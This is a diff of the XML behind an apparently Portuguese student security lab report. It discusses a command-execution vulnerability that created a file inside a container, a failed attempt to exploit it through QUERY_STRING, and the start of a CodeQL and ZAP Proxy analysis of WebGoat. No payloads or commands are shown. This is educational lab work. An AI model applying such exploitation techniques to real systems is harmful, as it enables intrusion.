           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -2282,14 +3714,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:tab/>
-        <w:t>Na figura 5, podemos confirmar, dentro do contentor, que o novo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ficheiro “NOVAPASTAAQUI” foi criado na pasta </w:t>
+        <w:t xml:space="preserve">Na figura 5, podemos confirmar, dentro do contentor, que o novo ficheiro “NOVAPASTAAQUI” foi criado na pasta </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2385,63 +3810,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> do servidor. Após </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>testes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">concluiu-se </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">que não é possível, porque este ficheiro só pode ser </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">por utilizadores com </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">permissões </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>adequadas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, neste caso, o utilizador </w:t>
+        <w:t xml:space="preserve"> do servidor. Após testes, concluiu-se que não é possível, porque este ficheiro só pode ser por utilizadores com permissões adequadas, neste caso, o utilizador </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2459,28 +3828,93 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Esta vulnerabilidade permite </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>a execução de comandos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, mas não </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>anula a necessidade de permissões para ler ficheiros protegidos</w:t>
+        <w:t xml:space="preserve">. Esta vulnerabilidade permite a execução de comandos, mas não anula a necessidade de permissões para ler ficheiros protegidos. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Por fim (alínea 2d), é questionado se é possível explorar esta vulnerabilidade através da variável de ambiente </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>QUERY_STRING</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, que é usada para guardar os dados enviados num pedido HTTP GET no URL após a marca ‘?’.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Este método </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">poderia ser usado para a mesma vulnerabilidade porque o resultado da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é guardado na </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>variável</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de ambiente QUERY_STRING</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2489,16 +3923,10 @@
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2510,134 +3938,38 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:tab/>
-        <w:t>Por fim (alínea 2d)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é questionado se é possível explorar esta vulnerabilidade através da variável de ambiente </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>QUERY_STRING</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, que é usada para guardar os dados enviados num pedido </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HTTP GET no URL após a marca ‘?’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">poderia ser usado para a mesma </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>vulnerabilidade</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> porque o resultado da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é guardado na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>variavel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de ambiente QUERY_STRING,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
+        <w:t xml:space="preserve">Após alguns testes parece não ser possível (testado no </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Brave</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">mas a maneira como o browser codifica a </w:t>
@@ -2646,7 +3978,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>string</w:t>
@@ -2655,32 +3988,30 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e a maneira como o server a descodifica porque pode modificar os comandos enviados no</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e a maneira como o server a descodifica porque pode modificar os comandos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (codificação/descodificação de espaços em branco por exemplo)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enviados na </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>string</w:t>
@@ -2689,7 +4020,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="yellow"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> fazendo com que os comandos não sejam executados.</w:t>
@@ -2704,8 +4034,10 @@
         </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc213009132"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2724,6 +4056,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>CodeQL</w:t>
       </w:r>
@@ -2731,12 +4064,1728 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> e ZAP Proxy</w:t>
       </w:r>
-    </w:p>
-    <w:p/>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc213009133"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> execução local</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc213009134"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é uma ferramenta de analise de código criada pela empresa </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Semmle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (adquirida mais tarde pelo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>GitHub</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vê o código a ser analisado como uma base dados, permitindo assim ao utilizador procurar por vulnerabilidade através de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>queries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> com uma linguagem semelhante ao SQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc213009135"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Utilização do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Depois de realizar o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>setup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> necessário para utilizar o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (A.1.a-c) e clonar e iniciar os repositórios que serão analisados usando esta </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>tool</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (A.1.d-e, A.2 e A.3), segundo o enunciado do trabalho, questionou-se o código fonte da aplicação </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>WebGoat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, com o objetivo de encontrar vulnerabilidades do tipo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
